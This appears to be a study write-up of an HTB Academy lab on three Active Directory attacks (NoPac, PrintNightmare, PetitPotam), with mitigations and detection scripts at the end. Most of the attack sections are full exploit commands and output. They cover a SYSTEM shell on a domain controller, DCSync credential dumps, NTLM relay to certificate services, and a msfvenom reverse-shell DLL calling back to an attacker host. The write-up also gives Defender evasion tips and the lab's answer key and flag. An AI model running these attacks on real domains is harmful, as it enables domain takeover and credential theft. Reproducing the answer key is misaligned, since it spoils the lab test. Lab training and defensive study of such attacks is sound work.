⚑ Bleeding Edge Vulnerabilities

🎯 HTB Academy: Active Directory Enumeration & Attacks

📝 Overview

Bleeding edge vulnerabilities are the most recent high-impact Active Directory attack vectors. These techniques exploit recently disclosed flaws that many organizations have not yet patched, giving a fast path to domain compromise. This module covers three such techniques: NoPac (SamAccountName spoofing), PrintNightmare, and PetitPotam (MS-EFSRPC). Each can lead to domain compromise from a standard user account, and PetitPotam even from unauthenticated access.


🔗 Attack Chain Context

Complete Active Directory Compromise Timeline:

Standard User Access → Bleeding Edge Exploitation → Domain Controller Compromise → Full Domain Control
   (Initial Access)       (Recent CVEs)            (SYSTEM/Admin Rights)        (Enterprise Owned)

Critical Characteristics:

  • Recent vulnerabilities: disclosed within the preceding 6-9 months (as of April 2022)

  • High impact: Direct path to Domain Controller compromise

  • Low privilege requirement: Standard domain user or unauthenticated access

  • Multiple attack vectors: Different exploitation methods for various scenarios

  • Patch management gap: Many organizations slow to deploy patches


🚨 Attack Techniques Overview

1. NoPac (SamAccountName Spoofing)

  • CVEs: CVE-2021-42278 and CVE-2021-42287

  • Requirements: Standard domain user credentials

  • Impact: Direct Domain Controller compromise and SYSTEM shell

  • Method: Computer account manipulation and Kerberos ticket spoofing

2. PrintNightmare

  • CVEs: CVE-2021-34527 and CVE-2021-1675

  • Requirements: Standard domain user credentials

  • Impact: Remote code execution and privilege escalation

  • Method: Print Spooler service exploitation

3. PetitPotam (MS-EFSRPC)

  • CVE: CVE-2021-36942

  • Requirements: Unauthenticated access (no credentials needed)

  • Impact: Domain compromise via certificate abuse

  • Method: NTLM relay to Active Directory Certificate Services


🎭 NoPac (SamAccountName Spoofing)

Vulnerability Overview

CVE Breakdown

CVE             Description                                                           Impact
CVE-2021-42278  Security Account Manager (SAM) bypass vulnerability                   Allows SamAccountName manipulation
CVE-2021-42287  Kerberos Privilege Attribute Certificate (PAC) vulnerability in ADDS  Enables privilege escalation via ticket spoofing

Attack Methodology

  1. Machine Account Creation: Add new computer account to domain (default quota: 10)

  2. Name Spoofing: Change SamAccountName to match Domain Controller

  3. Kerberos Exploitation: Request tickets using spoofed identity

  4. Privilege Escalation: Obtain SYSTEM-level access on Domain Controller

Prerequisites and Environment Setup

Tool Installation

# Install Impacket (required dependency)
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 setup.py install

# Clone NoPac exploit repository
git clone https://github.com/Ridter/noPac.git
cd noPac

Attack Requirements

  • Domain credentials: Standard domain user account

  • Machine quota: ms-DS-MachineAccountQuota > 0 (default: 10)

  • Network access: Connectivity to Domain Controller

  • Tool dependencies: Impacket toolkit properly installed

Vulnerability Assessment

Scanning for NoPac Vulnerability

# Check if target is vulnerable to NoPac
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Expected Output (Vulnerable System):

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
                                           
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5. Ticket size 1484
[*] Got TGT from ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. Ticket size 663

Key Vulnerability Indicators

  • Successful TGT retrieval: the scanner obtaining both TGTs shown above (note the differing ticket sizes) indicates a DC that has not received the November 2021 fix

  • Machine account quota: a non-zero ms-DS-MachineAccountQuota lets the standard user add the computer account the attack needs

  • PAC validation: the DC still honours the PAC handling the attack abuses

Exploitation Methods

Method 1: Interactive Shell Access

# Obtain SYSTEM shell on Domain Controller
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Complete Attack Output:

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-LWJFQMAXRVN$"
[*] MachineAccount "WIN-LWJFQMAXRVN$" password = &A#x8X^5iLva
[*] Successfully added machine account WIN-LWJFQMAXRVN$ with password &A#x8X^5iLva.
[*] WIN-LWJFQMAXRVN$ object = CN=WIN-LWJFQMAXRVN,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
[*] WIN-LWJFQMAXRVN$ sAMAccountName == ACADEMY-EA-DC01
[*] Saving ticket in ACADEMY-EA-DC01.ccache
[*] Resting the machine account to WIN-LWJFQMAXRVN$
[*] Restored WIN-LWJFQMAXRVN$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving ticket in administrator.ccache
[*] Remove ccache of ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Rename ccache with target ...
[*] Attempting to del a computer with the name: WIN-LWJFQMAXRVN$
[-] Delete computer WIN-LWJFQMAXRVN$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

Method 2: DCSync Attack

# Perform DCSync to extract administrator hash
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

DCSync Output:

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] will try to impersonat administrator
[*] Alreay have user administrator ticket for target ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
[*] Kerberos keys grabbed
inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25
inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f
[*] Cleaning up...

Post-Exploitation Considerations

Ticket Management

# Check for saved ccache files
ls -la *.ccache

# Typical files created:
# administrator_DC01.INLANEFREIGHT.local.ccache
# ACADEMY-EA-DC01.ccache

OPSEC Considerations

  • Semi-interactive shells: SMBExec.py creates noticeable artifacts

  • Service creation: BTOBTO and BTOBO services created during execution

  • Batch file execution: execute.bat files created and deleted for each command

  • AV/EDR detection: Shell establishment may trigger security alerts


🖨️ PrintNightmare

Vulnerability Overview

CVE Details

CVE             Description                                                 Impact
CVE-2021-34527  Windows Print Spooler remote code execution vulnerability   RCE with SYSTEM privileges
CVE-2021-1675   Windows Print Spooler privilege escalation vulnerability    Local and remote privilege escalation

Attack Prerequisites

  • Print Spooler service: must be running on the target (enabled by default on Windows, Domain Controllers included)

  • Domain credentials: Standard domain user access required

  • Network connectivity: Access to target Domain Controller

  • Exploit dependencies: Cube0x0's modified Impacket version

Environment Setup and Dependencies

Tool Installation

# Clone the exploit repository
git clone https://github.com/cube0x0/CVE-2021-1675.git

# Install cube0x0's modified Impacket (CRITICAL for exploit success)
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Service Enumeration

# Check for Print System protocols on target
rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

# Expected output:
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol 

Exploit Execution Workflow

Step 1: Payload Generation

# Create malicious DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

# Output:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes

Step 2: SMB Share Hosting

# Host payload on SMB share
sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

# Expected output:
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Step 3: Metasploit Handler Configuration

# Start Metasploit and configure handler
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST 172.16.5.225
LHOST => 172.16.5.225
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 8080
LPORT => 8080
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 172.16.5.225:8080 

Step 4: Exploit Execution

# Execute PrintNightmare exploit
sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

# Attack output:
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...

Step 5: SYSTEM Shell Access

# Successful exploitation result
[*] Sending stage (200262 bytes) to 172.16.5.5
[*] Meterpreter session 1 opened (172.16.5.225:8080 -> 172.16.5.5:58048 ) at 2022-03-29 13:06:20 -0400

(Meterpreter 1)(C:\Windows\system32) > shell
Process 5912 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Windows Defender Considerations

Detection Challenges

  • Service creation: BTOBTO service immediately flagged by Windows Defender

  • Batch file execution: execute.bat files trigger malicious behavior detection

  • Payload deployment: SMB-delivered DLL payloads often detected

  • VirTool detection: MSPSEexecCommand specifically identified by Defender

Evasion Strategies

  • Alternative payloads: Use different payload encoders or formats

  • Custom exploits: Modify exploit code to avoid signature detection

  • Living-off-the-land: Use legitimate Windows tools for post-exploitation


🎫 PetitPotam (MS-EFSRPC)

Vulnerability Overview

CVE-2021-36942 Details

  • Vulnerability Type: LSA spoofing vulnerability

  • Attack Method: NTLM relay to Active Directory Certificate Services

  • Authentication Required: None (unauthenticated attack)

  • Impact: Complete domain compromise via certificate abuse

  • Patch Status: Patched in August 2021

Attack Prerequisites

  • Active Directory Certificate Services (AD CS): Must be deployed in environment

  • Certificate Authority (CA): Web Enrollment (certsrv) role installed and reachable over HTTP

  • Network access: Connectivity to Domain Controller and CA server

  • Tool requirements: ntlmrelayx.py and PetitPotam.py

Attack Architecture

Attack Flow Diagram

Attacker Host → Domain Controller → Certificate Authority → Certificate Request
     ↓               ↓                       ↓                    ↓
PetitPotam.py → NTLM Authentication → Web Enrollment → Base64 Certificate
     ↓                                                           ↓
ntlmrelayx.py ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ← ←

Exploitation Workflow

Step 1: NTLM Relay Setup

# Start ntlmrelayx.py targeting CA Web Enrollment
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

# Relay server initialization:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server

[*] Servers started, waiting for connections

Step 2: Authentication Coercion

# Execute PetitPotam to coerce DC authentication
python3 PetitPotam.py 172.16.5.225 172.16.5.5

PetitPotam Execution Output:

              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:172.16.5.5[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!

[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Step 3: Certificate Retrieval

Successful NTLM Relay and Certificate Generation:

[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@172.16.5.5 controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL as INLANEFREIGHT/ACADEMY-EA-DC01$ SUCCEED
[*] SMBD-Thread-4: Connection from INLANEFREIGHT/ACADEMY-EA-DC01$@172.16.5.5 controlled, attacking target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL as INLANEFREIGHT/ACADEMY-EA-DC01$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE!
[*] Base64 certificate of user ACADEMY-EA-DC01$: 
[*] Skipping user ACADEMY-EA-DC01$ since attack was already performed

Certificate-to-TGT Conversion

Step 4: TGT Request with PKI Authentication

# Use obtained certificate to request TGT
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache

# TGT generation output:
2022-04-05 15:56:33,239 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2022-04-05 15:56:33,362 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2022-04-05 15:56:33,395 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2022-04-05 15:56:33,396 minikerberos INFO     70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275
INFO:minikerberos:70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275
2022-04-05 15:56:33,401 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Step 5: Environment Configuration and DCSync

# Set Kerberos ccache environment variable
export KRB5CCNAME=dc01.ccache

# Perform DCSync attack with obtained TGT
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

# DCSync results:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
[*] Kerberos keys grabbed
inlanefreight.local\administrator:aes256-cts-hmac-sha1-96:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
inlanefreight.local\administrator:aes128-cts-hmac-sha1-96:95c30f88301f9fe14ef5a8103b32eb25
inlanefreight.local\administrator:des-cbc-md5:70add6e02f70321f
[*] Cleaning up... 

Alternative Attack Paths

Method 1: Direct Hash Extraction with getnthash.py

# Extract NT hash using U2U and PAC decryption
python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

# Hash extraction output:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
313b6f423cd1ee07e91315b4919fb4ba

# Use extracted hash for DCSync
secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b435b51404fe:313b6f423cd1ee07e91315b4919fb4ba

Method 2: Windows Rubeus Pass-the-Ticket

# Use certificate with Rubeus for TGT request and PTT
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC...SNIP...IkHS2vJ51Ry4= /ptt

# Rubeus execution output:
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Building AS-REQ (w/ PKINIT preauth) for: 'INLANEFREIGHT.LOCAL\ACADEMY-EA-DC01$'
[*] Using domain controller: 172.16.5.5:88
[+] TGT request successful!
[+] Ticket successfully imported!

# Verify ticket import
klist

# Perform DCSync with Mimikatz
.\mimikatz.exe
mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt

🎯 HTB Academy Lab Solutions

Lab Environment Details

  • Attack Host: ATTACK01 (SSH access with htb-student:HTB_@cademy_stdnt!)

  • Target Domain: INLANEFREIGHT.LOCAL

  • Domain Controller: 172.16.5.5

  • Available Credentials: forend:Klmcargo2

🔍 Question 1: "Which two CVEs indicate NoPac.py may work? (Format: ####-#####&####-#####, no spaces)"

CVE Research and Answer

Based on the NoPac vulnerability documentation and attack methodology:

Answer: 2021-42278&2021-42287

Explanation:

  • CVE-2021-42278: Security Account Manager (SAM) bypass vulnerability allowing SamAccountName manipulation

  • CVE-2021-42287: Kerberos Privilege Attribute Certificate (PAC) vulnerability in ADDS enabling privilege escalation

🚀 Question 2: "Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop."

Complete Solution Walkthrough

Step 1: SSH to Attack Host

# Connect to ATTACK01
ssh htb-student@<target-ip>
# Password: HTB_@cademy_stdnt!

Step 2: Navigate to NoPac Directory

# Change to NoPac exploit directory
cd /opt/noPac

Step 3: Scan for Vulnerability

# Test if target is vulnerable to NoPac
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap

Step 4: Execute NoPac for Shell Access

# Obtain SYSTEM shell on Domain Controller
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

Step 5: Navigate to Flag Location

# From semi-interactive shell, navigate to Administrator desktop
C:\Windows\system32> cd C:\Users\Administrator\Desktop\DailyTasks
C:\Users\Administrator\Desktop\DailyTasks> dir
C:\Users\Administrator\Desktop\DailyTasks> type flag.txt

Alternative Method - DCSync Approach:

# Use NoPac for DCSync instead of shell
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator

# Use extracted administrator hash for authentication
crackmapexec smb 172.16.5.5 -u administrator -H <extracted_hash>

Step 6: Flag Retrieval

# Navigate to flag location and display contents
C:\Windows\system32> type C:\Users\Administrator\Desktop\DailyTasks\flag.txt
D0ntSl@ckonN0P@c!

🎯 Answer: D0ntSl@ckonN0P@c!


🛡️ Defensive Measures and Mitigations

NoPac Mitigations

Immediate Actions

# Set ms-DS-MachineAccountQuota to 0 so standard users can no longer add computer accounts
# (Set-ADDomain has no dedicated parameter for this attribute; write it with -Replace)
Set-ADDomain -Identity "DC=inlanefreight,DC=local" -Replace @{"ms-DS-MachineAccountQuota"="0"}

# Monitor for computer accounts created in the last day
# (the AD filter cannot evaluate method calls inline, so compute the cut-off first)
$since = (Get-Date).AddDays(-1)
Get-ADComputer -Filter {whenCreated -gt $since} -Properties whenCreated | Select-Object Name, whenCreated

Long-term Hardening

  • Patch Management: Apply CVE-2021-42278 and CVE-2021-42287 patches

  • Account Monitoring: Monitor for unusual computer account creation patterns

  • Privilege Reviews: Regular review of accounts with machine creation rights

  • Detection Rules: Implement SIEM rules for SamAccountName modifications
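A detection for the create / rename / rename-back sequence shown in the noPac.py output above, written as an added example for these notes (it is not the module's or the noPac project's code). The field names are those of Windows Security events 4741 and 4742; the DC list, the allowed joiner account and the sample events are assumptions.

```python
"""Flag NoPac-style sAMAccountName spoofing in Windows Security events.

Added example for these notes, not code from the HTB module or the noPac
project. It consumes Event ID 4741 (computer account created) and 4742
(computer account changed) records already parsed into dicts keyed by their
EventData field names. The domain controller list and the accounts allowed
to join computers are assumptions supplied by the operator.
"""
from datetime import datetime, timedelta

KNOWN_DCS = {"ACADEMY-EA-DC01"}          # DC hostnames from the lab
ALLOWED_CREATORS = {"svc-join"}          # assumption: the only legitimate joiner

# Constructed sample modelled on the noPac.py run above: "forend" creates
# WIN-LWJFQMAXRVN$, renames it to the DC's name (no trailing '$'), renames
# it back, and later the DC performs a benign self-update (SamAccountName "-"
# means the attribute did not change in that 4742).
SAMPLE_EVENTS = [
    {"EventID": 4741, "TimeCreated": "2022-04-05T15:50:01", "SubjectUserName": "forend",
     "TargetUserName": "WIN-LWJFQMAXRVN$", "TargetSid": "S-1-5-21-1-2-3-1108"},
    {"EventID": 4742, "TimeCreated": "2022-04-05T15:50:02", "SubjectUserName": "forend",
     "TargetSid": "S-1-5-21-1-2-3-1108", "SamAccountName": "ACADEMY-EA-DC01"},
    {"EventID": 4742, "TimeCreated": "2022-04-05T15:50:04", "SubjectUserName": "forend",
     "TargetSid": "S-1-5-21-1-2-3-1108", "SamAccountName": "WIN-LWJFQMAXRVN$"},
    {"EventID": 4742, "TimeCreated": "2022-04-05T16:10:00", "SubjectUserName": "ACADEMY-EA-DC01$",
     "TargetSid": "S-1-5-21-1-2-3-1000", "SamAccountName": "-"},
]


def analyze(events, known_dcs=KNOWN_DCS, allowed_creators=ALLOWED_CREATORS,
            window=timedelta(minutes=10)):
    """Return alerts as (severity, rule, detail) tuples, in event order."""
    dc_names = {dc.upper().rstrip("$") for dc in known_dcs}
    alerts = []
    renames = {}  # TargetSid -> [(time, new sAMAccountName)] for rename correlation
    for ev in events:
        when = datetime.fromisoformat(ev["TimeCreated"])
        actor = ev["SubjectUserName"]
        if ev["EventID"] == 4741:
            # Each join by a non-designated account spends ms-DS-MachineAccountQuota,
            # the precondition NoPac relies on.
            if actor not in allowed_creators:
                alerts.append(("medium", "machine-account-created-by-user",
                               f"{actor} created {ev['TargetUserName']}"))
            continue
        if ev["EventID"] != 4742:
            continue
        new_sam = ev.get("SamAccountName", "-")
        if new_sam == "-":
            continue
        sid = ev["TargetSid"]
        detail = f"{actor} set sAMAccountName of {sid} to {new_sam}"
        if not new_sam.endswith("$"):
            # Computer accounts always carry a trailing '$'; dropping it is step 2 of the attack.
            alerts.append(("high", "computer-sam-without-dollar", detail))
        if new_sam.upper().rstrip("$") in dc_names:
            alerts.append(("critical", "computer-sam-collides-with-dc", detail))
        # Two sAMAccountName changes on the same object in quick succession is the
        # rename / rename-back sequence seen in the tool output.
        history = renames.setdefault(sid, [])
        if any(when - prev_when <= window and prev_sam != new_sam
               for prev_when, prev_sam in history):
            alerts.append(("critical", "rapid-rename-sequence",
                           f"{sid} renamed twice within {window}; latest value {new_sam}"))
        history.append((when, new_sam))
    return alerts


if __name__ == "__main__":
    for severity, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {detail}")
```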

PrintNightmare Mitigations

Service Hardening

# Disable the Print Spooler service on hosts that do not need to print (Domain Controllers first)
Stop-Service -Name "Spooler" -Force
Set-Service -Name "Spooler" -StartupType Disabled

# Remove print drivers that are not needed
# (Remove-PrinterDriver has no -Force switch; use -Confirm:$false for unattended runs)
Remove-PrinterDriver -Name "Generic / Text Only" -Confirm:$false

Group Policy Configuration

  • Print Driver Installation: Restrict driver installation to administrators only

  • Point and Print: Disable point and print functionality via GPO

  • Package Point and Print: Configure secure package point and print settings
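A log-based check for the driver install the exploit above performs (its DLL is fetched from \\172.16.5.225\CompData, which the spooler logs as a UNC path), written as an added example for these notes and not taken from the module or the exploit project. The event IDs 316 and 808 are real PrintService/Operational events; the log lines, their "time id message" layout and the regular expressions are assumptions.

```python
"""Scan Print Spooler operational events for driver files pulled over UNC.

Added example for these notes, not code from the HTB module or the exploit
project. PrintNightmare's driver install loads the attacker's DLL from a
share, which is why the tool output above shows
\\??\\UNC\\172.16.5.225\\CompData\\backupscript.dll. The
Microsoft-Windows-PrintService/Operational log records driver additions as
Event 316 and failed plug-in loads as Event 808; the wording below follows
those events but the lines themselves are constructed. Input format assumed:
"<ISO time> <event id> <message>", one event per line.
"""
import re

SAMPLE_LOG = r"""
2022-03-29T13:06:10 316 Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, \??\UNC\172.16.5.225\CompData\backupscript.dll. No user action is required.
2022-03-29T13:06:11 808 The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\old\1\backupscript.dll, error code 0x45A. See the event user data for context information.
2022-03-29T09:00:00 316 Printer driver Microsoft Print To PDF for Windows x64 Version-3 was added or updated. Files:- C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_0123456789abcdef\PrintConfig.dll. No user action is required.
"""

LINE_RE = re.compile(r"^(?P<time>\S+)\s+(?P<event_id>\d+)\s+(?P<message>.*)$")
# \??\UNC\host\share\... or \\host\share\... anywhere in the file list
UNC_RE = re.compile(r"(?:\\\?\?\\UNC\\|\\\\)([^\\\s,]+)\\([^\\\s,]+)", re.IGNORECASE)
# A plug-in loaded from the spooler's \old\ staging directory is how the dropped
# driver gets executed; legitimate drivers live under the DriverStore.
SPOOL_OLD_RE = re.compile(r"\\spool\\drivers\\[^\\]+\\\d+\\old\\", re.IGNORECASE)


def parse(line):
    """Split one log line into time, event_id (int) and message; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["event_id"] = int(entry["event_id"])
    return entry


def assess(entry):
    """Return (severity, rule, evidence) for a suspicious entry, else None."""
    event_id, message = entry["event_id"], entry["message"]
    if event_id == 316:
        unc = UNC_RE.search(message)
        if unc:
            return ("critical", "driver-file-from-unc-path",
                    f"host={unc.group(1)} share={unc.group(2)}")
    if event_id == 808 and SPOOL_OLD_RE.search(message):
        module = message.split(" module ", 1)[1].split(",", 1)[0]
        return ("high", "plugin-load-from-spool-old-dir", module)
    return None


def scan(log_text):
    """Return (time, event_id, severity, rule, evidence) for each suspicious line."""
    findings = []
    for line in log_text.splitlines():
        entry = parse(line)
        if entry is None:
            continue
        verdict = assess(entry)
        if verdict is not None:
            findings.append((entry["time"], entry["event_id"]) + verdict)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```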

PetitPotam Mitigations

Certificate Services Hardening

# Enable Extended Protection for Authentication (EPA) on the CA Web Enrollment (certsrv) IIS site
# Require HTTPS on the CA Web Enrollment site and remove its HTTP binding
# Disable NTLM authentication on Domain Controllers (or restrict it with the NTLM audit/block policies)
# These are the mitigations Microsoft lists in KB5005413 (mitigating NTLM relay attacks on AD CS)

Network Controls

  • NTLM Relay Protection: require SMB signing and channel binding (Extended Protection for Authentication) so relayed NTLM sessions are rejected

  • Certificate Template Security: Review and harden certificate templates

  • Network Segmentation: Isolate Certificate Authority from general network

  • LDAP Authentication: Use Kerberos instead of NTLM where possible
